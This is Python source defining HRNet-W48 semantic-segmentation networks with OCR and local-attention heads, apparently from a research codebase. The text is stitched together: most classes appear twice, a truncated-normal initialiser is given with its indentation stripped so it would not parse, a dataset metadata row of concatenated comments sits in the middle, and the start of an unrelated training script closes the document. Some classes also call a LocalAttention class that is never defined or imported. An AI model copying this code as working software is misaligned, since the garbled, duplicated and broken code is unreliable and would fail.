        self.conv3x3 = nn.Sequential(
            nn.Conv2d(in_channels, 512, kernel_size=3, stride=1, padding=1),
            ModuleHelper.BNReLU(512, bn_type=self.configer.get("network", "bn_type")),
        )
        from lib.models.modules.spatial_ocr_block import SpatialGather_Module

        self.ocr_gather_head = SpatialGather_Module(self.num_classes)
        from lib.models.modules.spatial_ocr_block import SpatialOCR_Module

        self.ocr_distri_head = SpatialOCR_Module(
            in_channels=512,
            key_channels=256,
            out_channels=512,
            scale=1,
            dropout=0.05,
            bn_type=self.configer.get("network", "bn_type"),
        )
        self.cls_head = nn.Conv2d(
            512, self.num_classes, kernel_size=1, stride=1, padding=0, bias=True
        )
        # Auxiliary classifier over the raw fused features.
        self.aux_head = nn.Sequential(
            nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=1, padding=1),
            ModuleHelper.BNReLU(
                in_channels, bn_type=self.configer.get("network", "bn_type")
            ),
            nn.Conv2d(
                in_channels,
                self.num_classes,
                kernel_size=1,
                stride=1,
                padding=0,
                bias=True,
            ),
        )

    def forward(self, x_):
        x = self.backbone(x_)
        _, _, h, w = x[0].size()
        # Upsample every branch to the finest resolution and fuse.
        feat1 = x[0]
        feat2 = F.interpolate(x[1], size=(h, w), mode="bilinear", align_corners=True)
        feat3 = F.interpolate(x[2], size=(h, w), mode="bilinear", align_corners=True)
        feat4 = F.interpolate(x[3], size=(h, w), mode="bilinear", align_corners=True)
        feats = torch.cat([feat1, feat2, feat3, feat4], 1)
        out_aux = self.aux_head(feats)  # soft object regions for the OCR head
        feats = self.conv3x3(feats)
        context = self.ocr_gather_head(feats, out_aux)
        feats = self.ocr_distri_head(feats, context)
        out = self.cls_head(feats)
        out_aux = F.interpolate(
            out_aux, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
        )
        out = F.interpolate(
            out, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
        )
        return out_aux, out
class HRNet_W48_OCR_B(nn.Module):
    """
    Considering that the 3x3 convolution on the 4x resolution feature map is expensive,
    we can decrease the intermediate channels from 512 to 256 w/o performance loss.

    Same structure as HRNet_W48_OCR but with halved OCR channel widths
    (256/128 instead of 512/256). Forward returns ``(out_aux, out)``.
    """

    def __init__(self, configer):
        super(HRNet_W48_OCR_B, self).__init__()
        self.configer = configer
        self.num_classes = self.configer.get("data", "num_classes")
        self.backbone = BackboneSelector(configer).get_backbone()
        in_channels = 720  # 48 + 96 + 192 + 384
        self.conv3x3 = nn.Sequential(
            nn.Conv2d(in_channels, 256, kernel_size=3, stride=1, padding=1),
            ModuleHelper.BNReLU(256, bn_type=self.configer.get("network", "bn_type")),
        )
        from lib.models.modules.spatial_ocr_block import SpatialGather_Module

        self.ocr_gather_head = SpatialGather_Module(self.num_classes)
        from lib.models.modules.spatial_ocr_block import SpatialOCR_Module

        self.ocr_distri_head = SpatialOCR_Module(
            in_channels=256,
            key_channels=128,
            out_channels=256,
            scale=1,
            dropout=0.05,
            bn_type=self.configer.get("network", "bn_type"),
        )
        self.cls_head = nn.Conv2d(
            256, self.num_classes, kernel_size=1, stride=1, padding=0, bias=True
        )
        # Auxiliary classifier over the raw fused features.
        self.aux_head = nn.Sequential(
            nn.Conv2d(in_channels, 256, kernel_size=3, stride=1, padding=1),
            ModuleHelper.BNReLU(256, bn_type=self.configer.get("network", "bn_type")),
            nn.Conv2d(
                256, self.num_classes, kernel_size=1, stride=1, padding=0, bias=True
            ),
        )

    def forward(self, x_):
        x = self.backbone(x_)
        _, _, h, w = x[0].size()
        # Upsample every branch to the finest resolution and fuse.
        feat1 = x[0]
        feat2 = F.interpolate(x[1], size=(h, w), mode="bilinear", align_corners=True)
        feat3 = F.interpolate(x[2], size=(h, w), mode="bilinear", align_corners=True)
        feat4 = F.interpolate(x[3], size=(h, w), mode="bilinear", align_corners=True)
        feats = torch.cat([feat1, feat2, feat3, feat4], 1)
        out_aux = self.aux_head(feats)  # soft object regions for the OCR head
        feats = self.conv3x3(feats)
        context = self.ocr_gather_head(feats, out_aux)
        feats = self.ocr_distri_head(feats, context)
        out = self.cls_head(feats)
        out_aux = F.interpolate(
            out_aux, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
        )
        out = F.interpolate(
            out, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
        )
        return out_aux, out
class HRNet_W48_SegTR(nn.Module):
    """HRNet-W48 + OCR head with a local-attention block before OCR.

    NOTE(review): ``LocalAttention`` is neither defined nor imported in this
    module -- confirm where it is supposed to come from before instantiating
    this class. Forward returns ``(out_aux, out)``.
    """

    def __init__(self, configer):
        super(HRNet_W48_SegTR, self).__init__()
        self.configer = configer
        self.num_classes = self.configer.get("data", "num_classes")
        self.backbone = BackboneSelector(configer).get_backbone()
        in_channels = 720
        self.conv3x3 = nn.Sequential(
            nn.Conv2d(in_channels, 512, kernel_size=3, stride=1, padding=1),
            ModuleHelper.BNReLU(512, bn_type=self.configer.get("network", "bn_type")),
        )
        from lib.models.modules.spatial_ocr_block import SpatialGather_Module

        self.ocr_gather_head = SpatialGather_Module(self.num_classes)
        from lib.models.modules.spatial_ocr_block import SpatialOCR_Module

        self.ocr_distri_head = SpatialOCR_Module(
            in_channels=512,
            key_channels=256,
            out_channels=512,
            scale=1,
            dropout=0.05,
            bn_type=self.configer.get("network", "bn_type"),
        )
        self.cls_head = nn.Conv2d(
            512, self.num_classes, kernel_size=1, stride=1, padding=0, bias=True
        )
        # Auxiliary classifier over the raw fused features.
        self.aux_head = nn.Sequential(
            nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=1, padding=1),
            ModuleHelper.BNReLU(
                in_channels, bn_type=self.configer.get("network", "bn_type")
            ),
            nn.Conv2d(
                in_channels,
                self.num_classes,
                kernel_size=1,
                stride=1,
                padding=0,
                bias=True,
            ),
        )
        self.local_attn = LocalAttention(
            in_channels=512,
            embed_dim=256,
            down_factor=[8, 8],
            rpe=False,
            norm_layer=ModuleHelper.BatchNorm2d(
                bn_type=self.configer.get("network", "bn_type")
            ),
        )

    def forward(self, x_):
        x = self.backbone(x_)
        _, _, h, w = x[0].size()
        # Upsample every branch to the finest resolution and fuse.
        feat1 = x[0]
        feat2 = F.interpolate(x[1], size=(h, w), mode="bilinear", align_corners=True)
        feat3 = F.interpolate(x[2], size=(h, w), mode="bilinear", align_corners=True)
        feat4 = F.interpolate(x[3], size=(h, w), mode="bilinear", align_corners=True)
        feats = torch.cat([feat1, feat2, feat3, feat4], 1)
        out_aux = self.aux_head(feats)
        feats = self.conv3x3(feats)
        # pre- local attention
        feats = self.local_attn(feats)
        context = self.ocr_gather_head(feats, out_aux)
        feats = self.ocr_distri_head(feats, context)
        out = self.cls_head(feats)
        out_aux = F.interpolate(
            out_aux, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
        )
        out = F.interpolate(
            out, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
        )
        return out_aux, out
def _no_grad_trunc_normal_(tensor, mean, std, a, b):
# Cut & paste from PyTorch official master until it's in a few official releases - RW
# Method based on https://people.sc.fsu.edu/~jburkardt/presentations/truncated_normal.pdf
def norm_cdf(x):
# Computes standard normal cumulative distribution function
return (1.0 + math.erf(x / math.sqrt(2.0))) / 2.0
if (mean < a - 2 * std) or (mean > b + 2 * std):
warnings.warn(
"mean is more than 2 std from [a, b] in nn.init.trunc_normal_. "
"The distribution of values may be incorrect.",
stacklevel=2,
)
with torch.no_grad():
# Values are generated by using a truncated uniform distribution and
# then using the inverse CDF for the normal distribution.
# Get upper and lower cdf values
l = norm_cdf((a - mean) / std)
u = norm_cdf((b - mean) / std)
# Uniformly fill tensor with values from [l, u], then translate to
# [2l-1, 2u-1].
tensor.uniform_(2 * l - 1, 2 * u - 1)
# Use inverse cdf transform for normal distribution to get truncated
# standard normal
tensor.erfinv_()
# Transform to proper mean, std
tensor.mul_(std * math.sqrt(2.0))
tensor.add_(mean)
# Clamp to ensure it's in the proper range
tensor.clamp_(min=a, max=b)
return tensor
def trunc_normal_(tensor, mean=0.0, std=1.0, a=-2.0, b=2.0):
    """In-place truncated-normal init of *tensor* on [a, b]; returns the tensor."""
    return _no_grad_trunc_normal_(tensor, mean, std, a, b)
class HRNet_W48_SegTREmbedding(nn.Module):
    """HRNet-W48 + OCR variant where both classifiers are learned class
    embeddings (nn.Parameter) applied via batched matrix products instead of
    1x1 convolutions.

    NOTE(review): ``LocalAttention`` is neither defined nor imported in this
    module -- confirm where it is supposed to come from before instantiating
    this class. Forward returns ``(out_aux, out)``.
    """

    def __init__(self, configer):
        super(HRNet_W48_SegTREmbedding, self).__init__()
        self.configer = configer
        self.num_classes = self.configer.get("data", "num_classes")
        self.backbone = BackboneSelector(configer).get_backbone()
        in_channels = 720
        ocr_mid_channels = 512
        ocr_key_channels = 256
        self.conv3x3 = nn.Sequential(
            nn.Conv2d(
                in_channels, ocr_mid_channels, kernel_size=3, stride=1, padding=1
            ),
            ModuleHelper.BNReLU(
                ocr_mid_channels, bn_type=self.configer.get("network", "bn_type")
            ),
        )
        from lib.models.modules.spatial_ocr_block import SpatialGather_Module

        self.ocr_gather_head = SpatialGather_Module(self.num_classes)
        from lib.models.modules.spatial_ocr_block import SpatialOCR_Module

        self.ocr_distri_head = SpatialOCR_Module(
            in_channels=ocr_mid_channels,
            key_channels=ocr_key_channels,
            out_channels=ocr_mid_channels,
            scale=1,
            dropout=0.05,
            bn_type=self.configer.get("network", "bn_type"),
        )
        # Learned class-embedding classifier: (1, channels, num_classes).
        self.cls_head = nn.Parameter(torch.zeros(1, ocr_mid_channels, self.num_classes))
        trunc_normal_(self.cls_head, std=0.02)
        # self.cls_head = nn.Conv2d(512, self.num_classes, kernel_size=1, stride=1, padding=0, bias=True)
        self.aux_head_proj = nn.Sequential(
            nn.Conv2d(in_channels, in_channels, kernel_size=1, stride=1, padding=0),
            ModuleHelper.BNReLU(
                in_channels, bn_type=self.configer.get("network", "bn_type")
            ),
        )
        # Auxiliary class embedding applied to the projected fused features.
        self.aux_head = nn.Parameter(torch.zeros(1, in_channels, self.num_classes))
        # self.business_layer.append(self.aux_head)
        trunc_normal_(self.aux_head, std=0.02)
        self.local_attn = LocalAttention(
            in_channels=ocr_mid_channels,
            embed_dim=ocr_key_channels,
            down_factor=[8, 8],
            rpe=False,
            norm_layer=ModuleHelper.BatchNorm2d(
                bn_type=self.configer.get("network", "bn_type")
            ),
        )

    def forward(self, x_):
        x = self.backbone(x_)
        b, _, h, w = x[0].size()
        # Upsample every branch to the finest resolution and fuse.
        feat1 = x[0]
        feat2 = F.interpolate(x[1], size=(h, w), mode="bilinear", align_corners=True)
        feat3 = F.interpolate(x[2], size=(h, w), mode="bilinear", align_corners=True)
        feat4 = F.interpolate(x[3], size=(h, w), mode="bilinear", align_corners=True)
        feats = torch.cat([feat1, feat2, feat3, feat4], 1)
        aux_feat = self.aux_head_proj(feats)
        # Class scores = embedding^T . features, reshaped back to a map.
        out_aux = torch.bmm(
            self.aux_head.repeat(b, 1, 1).permute(0, 2, 1), aux_feat.flatten(2)
        ).view(b, -1, h, w)
        # out_aux = self.aux_head(feats)
        feats = self.conv3x3(feats)
        # pre- local attention
        feats = self.local_attn(feats)
        context = self.ocr_gather_head(feats, out_aux)
        feats = self.ocr_distri_head(feats, context)
        out = torch.bmm(
            self.cls_head.repeat(b, 1, 1).permute(0, 2, 1), feats.flatten(2)
        ).view(b, -1, h, w)
        out_aux = F.interpolate(
            out_aux, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
        )
        out = F.interpolate(
            out, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
        )
        return out_aux, out
| ##+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
## Created by: RainbowSecret
## Microsoft Research
## <EMAIL>
## Copyright (c) 2018
##
## This source code is licensed under the MIT-style license found in the
## LICENSE file in the root directory of this source tree
##+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
import os
import pdb
import torch
import torch.nn as nn
import torch.nn.functional as F
from lib.models.backbones.backbone_selector import BackboneSelector
from lib.models.tools.module_helper import ModuleHelper
class HRNet_W48(nn.Module):
    """
    deep high-resolution representation learning for human pose estimation, CVPR2019

    The four HRNet branches are upsampled to the finest resolution,
    concatenated, and classified by a 3x3-conv + 1x1-conv head.
    """

    def __init__(self, configer):
        super(HRNet_W48, self).__init__()
        self.configer = configer
        self.num_classes = self.configer.get("data", "num_classes")
        self.backbone = BackboneSelector(configer).get_backbone()
        # Concatenated channels of the four HRNet branches: 48 + 96 + 192 + 384.
        in_channels = 720
        bn_type = self.configer.get("network", "bn_type")
        self.cls_head = nn.Sequential(
            nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=1, padding=1),
            ModuleHelper.BNReLU(in_channels, bn_type=bn_type),
            nn.Dropout2d(0.10),
            nn.Conv2d(in_channels, self.num_classes, kernel_size=1,
                      stride=1, padding=0, bias=False),
        )

    def forward(self, x_):
        branches = self.backbone(x_)
        _, _, h, w = branches[0].size()
        # Bring every coarser branch up to the finest branch's resolution.
        upsampled = [branches[0]] + [
            F.interpolate(feat, size=(h, w), mode="bilinear", align_corners=True)
            for feat in branches[1:4]
        ]
        fused = torch.cat(upsampled, 1)
        logits = self.cls_head(fused)
        # Upsample logits back to the input resolution.
        return F.interpolate(logits, size=(x_.size(2), x_.size(3)),
                             mode="bilinear", align_corners=True)
class HRNet_W48_ASPOCR(nn.Module):
    """HRNet-W48 with an ASP-OCR head.

    Forward returns ``(out_aux, out)``: the auxiliary per-class maps and the
    refined prediction, both upsampled to the input resolution.
    """

    def __init__(self, configer):
        super(HRNet_W48_ASPOCR, self).__init__()
        self.configer = configer
        self.num_classes = self.configer.get("data", "num_classes")
        self.backbone = BackboneSelector(configer).get_backbone()
        # extra added layers
        in_channels = 720  # 48 + 96 + 192 + 384
        from lib.models.modules.spatial_ocr_block import SpatialOCR_ASP_Module

        self.asp_ocr_head = SpatialOCR_ASP_Module(
            features=720,
            hidden_features=256,
            out_features=256,
            dilations=(24, 48, 72),
            num_classes=self.num_classes,
            bn_type=self.configer.get("network", "bn_type"),
        )
        self.cls_head = nn.Conv2d(
            256, self.num_classes, kernel_size=1, stride=1, padding=0, bias=False
        )
        # Auxiliary classifier over the raw fused features.
        self.aux_head = nn.Sequential(
            nn.Conv2d(in_channels, 512, kernel_size=3, stride=1, padding=1),
            ModuleHelper.BNReLU(512, bn_type=self.configer.get("network", "bn_type")),
            nn.Conv2d(
                512, self.num_classes, kernel_size=1, stride=1, padding=0, bias=False
            ),
        )

    def forward(self, x_):
        x = self.backbone(x_)
        _, _, h, w = x[0].size()
        # Upsample every branch to the finest resolution and fuse.
        feat1 = x[0]
        feat2 = F.interpolate(x[1], size=(h, w), mode="bilinear", align_corners=True)
        feat3 = F.interpolate(x[2], size=(h, w), mode="bilinear", align_corners=True)
        feat4 = F.interpolate(x[3], size=(h, w), mode="bilinear", align_corners=True)
        feats = torch.cat([feat1, feat2, feat3, feat4], 1)
        out_aux = self.aux_head(feats)  # soft object regions for the OCR head
        feats = self.asp_ocr_head(feats, out_aux)
        out = self.cls_head(feats)
        out_aux = F.interpolate(
            out_aux, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
        )
        out = F.interpolate(
            out, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
        )
        return out_aux, out
class HRNet_W48_OCR(nn.Module):
    """HRNet-W48 with an OCR (object-contextual representation) head.

    Forward returns ``(out_aux, out)``: auxiliary soft object regions feed
    the OCR gather/distribute modules that refine the main prediction.
    """

    def __init__(self, configer):
        super(HRNet_W48_OCR, self).__init__()
        self.configer = configer
        self.num_classes = self.configer.get("data", "num_classes")
        self.backbone = BackboneSelector(configer).get_backbone()
        # Concatenated channels of the four HRNet branches (48+96+192+384).
        in_channels = 720
        self.conv3x3 = nn.Sequential(
            nn.Conv2d(in_channels, 512, kernel_size=3, stride=1, padding=1),
            ModuleHelper.BNReLU(512, bn_type=self.configer.get("network", "bn_type")),
        )
        from lib.models.modules.spatial_ocr_block import SpatialGather_Module

        self.ocr_gather_head = SpatialGather_Module(self.num_classes)
        from lib.models.modules.spatial_ocr_block import SpatialOCR_Module

        self.ocr_distri_head = SpatialOCR_Module(
            in_channels=512,
            key_channels=256,
            out_channels=512,
            scale=1,
            dropout=0.05,
            bn_type=self.configer.get("network", "bn_type"),
        )
        self.cls_head = nn.Conv2d(
            512, self.num_classes, kernel_size=1, stride=1, padding=0, bias=True
        )
        # Auxiliary classifier over the raw fused features.
        self.aux_head = nn.Sequential(
            nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=1, padding=1),
            ModuleHelper.BNReLU(
                in_channels, bn_type=self.configer.get("network", "bn_type")
            ),
            nn.Conv2d(
                in_channels,
                self.num_classes,
                kernel_size=1,
                stride=1,
                padding=0,
                bias=True,
            ),
        )

    def forward(self, x_):
        x = self.backbone(x_)
        _, _, h, w = x[0].size()
        # Upsample every branch to the finest resolution and fuse.
        feat1 = x[0]
        feat2 = F.interpolate(x[1], size=(h, w), mode="bilinear", align_corners=True)
        feat3 = F.interpolate(x[2], size=(h, w), mode="bilinear", align_corners=True)
        feat4 = F.interpolate(x[3], size=(h, w), mode="bilinear", align_corners=True)
        feats = torch.cat([feat1, feat2, feat3, feat4], 1)
        out_aux = self.aux_head(feats)  # soft object regions for the OCR head
        feats = self.conv3x3(feats)
        context = self.ocr_gather_head(feats, out_aux)
        feats = self.ocr_distri_head(feats, context)
        out = self.cls_head(feats)
        out_aux = F.interpolate(
            out_aux, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
        )
        out = F.interpolate(
            out, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
        )
        return out_aux, out
class HRNet_W48_OCR_B(nn.Module):
    """
    Considering that the 3x3 convolution on the 4x resolution feature map is expensive,
    we can decrease the intermediate channels from 512 to 256 w/o performance loss.
    """

    def __init__(self, configer):
        super(HRNet_W48_OCR_B, self).__init__()
        self.configer = configer
        self.num_classes = self.configer.get("data", "num_classes")
        self.backbone = BackboneSelector(configer).get_backbone()
        in_channels = 720  # 48 + 96 + 192 + 384
        # Slimmer 256-channel variant of the OCR pipeline (cf. HRNet_W48_OCR).
        self.conv3x3 = nn.Sequential(
            nn.Conv2d(in_channels, 256, kernel_size=3, stride=1, padding=1),
            ModuleHelper.BNReLU(256, bn_type=self.configer.get("network", "bn_type")),
        )
        from lib.models.modules.spatial_ocr_block import SpatialGather_Module

        self.ocr_gather_head = SpatialGather_Module(self.num_classes)
        from lib.models.modules.spatial_ocr_block import SpatialOCR_Module

        self.ocr_distri_head = SpatialOCR_Module(
            in_channels=256,
            key_channels=128,
            out_channels=256,
            scale=1,
            dropout=0.05,
            bn_type=self.configer.get("network", "bn_type"),
        )
        self.cls_head = nn.Conv2d(
            256, self.num_classes, kernel_size=1, stride=1, padding=0, bias=True
        )
        # Auxiliary classifier; its coarse prediction drives context gathering.
        self.aux_head = nn.Sequential(
            nn.Conv2d(in_channels, 256, kernel_size=3, stride=1, padding=1),
            ModuleHelper.BNReLU(256, bn_type=self.configer.get("network", "bn_type")),
            nn.Conv2d(
                256, self.num_classes, kernel_size=1, stride=1, padding=0, bias=True
            ),
        )

    def forward(self, x_):
        """Return ``(out_aux, out)`` logits at the input spatial resolution."""
        x = self.backbone(x_)
        _, _, h, w = x[0].size()
        # Fuse the four backbone branches at the finest resolution.
        feat1 = x[0]
        feat2 = F.interpolate(x[1], size=(h, w), mode="bilinear", align_corners=True)
        feat3 = F.interpolate(x[2], size=(h, w), mode="bilinear", align_corners=True)
        feat4 = F.interpolate(x[3], size=(h, w), mode="bilinear", align_corners=True)
        feats = torch.cat([feat1, feat2, feat3, feat4], 1)
        out_aux = self.aux_head(feats)
        feats = self.conv3x3(feats)
        context = self.ocr_gather_head(feats, out_aux)
        feats = self.ocr_distri_head(feats, context)
        out = self.cls_head(feats)
        out_aux = F.interpolate(
            out_aux, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
        )
        out = F.interpolate(
            out, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
        )
        return out_aux, out
class HRNet_W48_SegTR(nn.Module):
    """HRNet-W48 + OCR head with a windowed local-attention stage in between."""

    def __init__(self, configer):
        super(HRNet_W48_SegTR, self).__init__()
        self.configer = configer
        self.num_classes = self.configer.get("data", "num_classes")
        self.backbone = BackboneSelector(configer).get_backbone()
        # Concatenated channel count of the four HRNet-W48 branches.
        in_channels = 720
        self.conv3x3 = nn.Sequential(
            nn.Conv2d(in_channels, 512, kernel_size=3, stride=1, padding=1),
            ModuleHelper.BNReLU(512, bn_type=self.configer.get("network", "bn_type")),
        )
        from lib.models.modules.spatial_ocr_block import SpatialGather_Module

        self.ocr_gather_head = SpatialGather_Module(self.num_classes)
        from lib.models.modules.spatial_ocr_block import SpatialOCR_Module

        self.ocr_distri_head = SpatialOCR_Module(
            in_channels=512,
            key_channels=256,
            out_channels=512,
            scale=1,
            dropout=0.05,
            bn_type=self.configer.get("network", "bn_type"),
        )
        self.cls_head = nn.Conv2d(
            512, self.num_classes, kernel_size=1, stride=1, padding=0, bias=True
        )
        self.aux_head = nn.Sequential(
            nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=1, padding=1),
            ModuleHelper.BNReLU(
                in_channels, bn_type=self.configer.get("network", "bn_type")
            ),
            nn.Conv2d(
                in_channels,
                self.num_classes,
                kernel_size=1,
                stride=1,
                padding=0,
                bias=True,
            ),
        )
        # Local attention over the projected 512-channel features.
        # NOTE(review): ``norm_layer`` receives the *result* of
        # ModuleHelper.BatchNorm2d(...) -- presumably a norm class/factory;
        # confirm against LocalAttention's expected argument type.
        self.local_attn = LocalAttention(
            in_channels=512,
            embed_dim=256,
            down_factor=[8, 8],
            rpe=False,
            norm_layer=ModuleHelper.BatchNorm2d(
                bn_type=self.configer.get("network", "bn_type")
            ),
        )

    def forward(self, x_):
        """Return ``(out_aux, out)`` logits at the input spatial resolution."""
        x = self.backbone(x_)
        _, _, h, w = x[0].size()
        # Fuse the four backbone branches at the finest resolution.
        feat1 = x[0]
        feat2 = F.interpolate(x[1], size=(h, w), mode="bilinear", align_corners=True)
        feat3 = F.interpolate(x[2], size=(h, w), mode="bilinear", align_corners=True)
        feat4 = F.interpolate(x[3], size=(h, w), mode="bilinear", align_corners=True)
        feats = torch.cat([feat1, feat2, feat3, feat4], 1)
        out_aux = self.aux_head(feats)
        feats = self.conv3x3(feats)
        # pre- local attention: refine features with windowed self-attention
        # before gathering per-class context.
        feats = self.local_attn(feats)
        context = self.ocr_gather_head(feats, out_aux)
        feats = self.ocr_distri_head(feats, context)
        out = self.cls_head(feats)
        out_aux = F.interpolate(
            out_aux, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
        )
        out = F.interpolate(
            out, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
        )
        return out_aux, out
def _no_grad_trunc_normal_(tensor, mean, std, a, b):
# Cut & paste from PyTorch official master until it's in a few official releases - RW
# Method based on https://people.sc.fsu.edu/~jburkardt/presentations/truncated_normal.pdf
def norm_cdf(x):
# Computes standard normal cumulative distribution function
return (1.0 + math.erf(x / math.sqrt(2.0))) / 2.0
if (mean < a - 2 * std) or (mean > b + 2 * std):
warnings.warn(
"mean is more than 2 std from [a, b] in nn.init.trunc_normal_. "
"The distribution of values may be incorrect.",
stacklevel=2,
)
with torch.no_grad():
# Values are generated by using a truncated uniform distribution and
# then using the inverse CDF for the normal distribution.
# Get upper and lower cdf values
l = norm_cdf((a - mean) / std)
u = norm_cdf((b - mean) / std)
# Uniformly fill tensor with values from [l, u], then translate to
# [2l-1, 2u-1].
tensor.uniform_(2 * l - 1, 2 * u - 1)
# Use inverse cdf transform for normal distribution to get truncated
# standard normal
tensor.erfinv_()
# Transform to proper mean, std
tensor.mul_(std * math.sqrt(2.0))
tensor.add_(mean)
# Clamp to ensure it's in the proper range
tensor.clamp_(min=a, max=b)
return tensor
def trunc_normal_(tensor, mean=0.0, std=1.0, a=-2.0, b=2.0):
    """Fill *tensor* in-place from N(mean, std) truncated to [a, b]; returns it."""
    return _no_grad_trunc_normal_(tensor, mean, std, a, b)
class HRNet_W48_SegTREmbedding(nn.Module):
    """HRNet-W48 + local attention + OCR with embedding-matrix classifiers.

    Unlike the convolutional heads above, both the auxiliary and the final
    classifiers are learned ``(1, channels, num_classes)`` parameter matrices
    applied via batched matrix multiplication against flattened features.
    """

    def __init__(self, configer):
        super(HRNet_W48_SegTREmbedding, self).__init__()
        self.configer = configer
        self.num_classes = self.configer.get("data", "num_classes")
        self.backbone = BackboneSelector(configer).get_backbone()
        # Concatenated channel count of the four HRNet-W48 branches.
        in_channels = 720
        ocr_mid_channels = 512
        ocr_key_channels = 256
        self.conv3x3 = nn.Sequential(
            nn.Conv2d(
                in_channels, ocr_mid_channels, kernel_size=3, stride=1, padding=1
            ),
            ModuleHelper.BNReLU(
                ocr_mid_channels, bn_type=self.configer.get("network", "bn_type")
            ),
        )
        from lib.models.modules.spatial_ocr_block import SpatialGather_Module

        self.ocr_gather_head = SpatialGather_Module(self.num_classes)
        from lib.models.modules.spatial_ocr_block import SpatialOCR_Module

        self.ocr_distri_head = SpatialOCR_Module(
            in_channels=ocr_mid_channels,
            key_channels=ocr_key_channels,
            out_channels=ocr_mid_channels,
            scale=1,
            dropout=0.05,
            bn_type=self.configer.get("network", "bn_type"),
        )
        # Final classifier as a class-embedding matrix instead of a 1x1 conv.
        self.cls_head = nn.Parameter(torch.zeros(1, ocr_mid_channels, self.num_classes))
        trunc_normal_(self.cls_head, std=0.02)
        # self.cls_head = nn.Conv2d(512, self.num_classes, kernel_size=1, stride=1, padding=0, bias=True)
        # 1x1 projection feeding the auxiliary embedding classifier.
        self.aux_head_proj = nn.Sequential(
            nn.Conv2d(in_channels, in_channels, kernel_size=1, stride=1, padding=0),
            ModuleHelper.BNReLU(
                in_channels, bn_type=self.configer.get("network", "bn_type")
            ),
        )
        # Auxiliary classifier, likewise an embedding matrix.
        self.aux_head = nn.Parameter(torch.zeros(1, in_channels, self.num_classes))
        # self.business_layer.append(self.aux_head)
        trunc_normal_(self.aux_head, std=0.02)
        # NOTE(review): ``norm_layer`` receives the *result* of
        # ModuleHelper.BatchNorm2d(...) -- confirm LocalAttention's contract.
        self.local_attn = LocalAttention(
            in_channels=ocr_mid_channels,
            embed_dim=ocr_key_channels,
            down_factor=[8, 8],
            rpe=False,
            norm_layer=ModuleHelper.BatchNorm2d(
                bn_type=self.configer.get("network", "bn_type")
            ),
        )

    def forward(self, x_):
        """Return ``(out_aux, out)`` logits at the input spatial resolution."""
        x = self.backbone(x_)
        b, _, h, w = x[0].size()
        # Fuse the four backbone branches at the finest resolution.
        feat1 = x[0]
        feat2 = F.interpolate(x[1], size=(h, w), mode="bilinear", align_corners=True)
        feat3 = F.interpolate(x[2], size=(h, w), mode="bilinear", align_corners=True)
        feat4 = F.interpolate(x[3], size=(h, w), mode="bilinear", align_corners=True)
        feats = torch.cat([feat1, feat2, feat3, feat4], 1)
        aux_feat = self.aux_head_proj(feats)
        # (b, K, C) x (b, C, h*w) -> (b, K, h*w) -> (b, K, h, w) where
        # K = num_classes and C = in_channels.
        out_aux = torch.bmm(
            self.aux_head.repeat(b, 1, 1).permute(0, 2, 1), aux_feat.flatten(2)
        ).view(b, -1, h, w)
        # out_aux = self.aux_head(feats)
        feats = self.conv3x3(feats)
        # pre- local attention
        feats = self.local_attn(feats)
        context = self.ocr_gather_head(feats, out_aux)
        feats = self.ocr_distri_head(feats, context)
        # Same embedding-matrix classification for the final output.
        out = torch.bmm(
            self.cls_head.repeat(b, 1, 1).permute(0, 2, 1), feats.flatten(2)
        ).view(b, -1, h, w)
        out_aux = F.interpolate(
            out_aux, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
        )
        out = F.interpolate(
            out, size=(x_.size(2), x_.size(3)), mode="bilinear", align_corners=True
        )
        return out_aux, out
| en | 0.757793 | ##+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ## Created by: RainbowSecret ## Microsoft Research ## <EMAIL> ## Copyright (c) 2018 ## ## This source code is licensed under the MIT-style license found in the ## LICENSE file in the root directory of this source tree ##+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ deep high-resolution representation learning for human pose estimation, CVPR2019 # extra added layers # 48 + 96 + 192 + 384 # extra added layers # 48 + 96 + 192 + 384 Considering that the 3x3 convolution on the 4x resolution feature map is expensive,
we can decrease the intermediate channels from 512 to 256 w/o performance loss. # 48 + 96 + 192 + 384 # pre- local attention # Cut & paste from PyTorch official master until it's in a few official releases - RW # Method based on https://people.sc.fsu.edu/~jburkardt/presentations/truncated_normal.pdf # Computes standard normal cumulative distribution function # Values are generated by using a truncated uniform distribution and # then using the inverse CDF for the normal distribution. # Get upper and lower cdf values # Uniformly fill tensor with values from [l, u], then translate to # [2l-1, 2u-1]. # Use inverse cdf transform for normal distribution to get truncated # standard normal # Transform to proper mean, std # Clamp to ensure it's in the proper range # self.cls_head = nn.Conv2d(512, self.num_classes, kernel_size=1, stride=1, padding=0, bias=True) # self.business_layer.append(self.aux_head) # out_aux = self.aux_head(feats) # pre- local attention | 2.094691 | 2 |
scripts/uncertainty_scripts/train_local_latent.py | neuroailab/curiosity_deprecated | 0 | 6617373 | <reponame>neuroailab/curiosity_deprecated
'''
Local test for latent space model training.
'''
import sys
sys.path.append('curiosity')
sys.path.append('tfutils')
import tensorflow as tf
from curiosity.interaction import train
from curiosity.interaction.models import mario_world_model_config
from tfutils import base, optimizer
import numpy as np
# One "epoch" is set absurdly large so the exponential decay below never
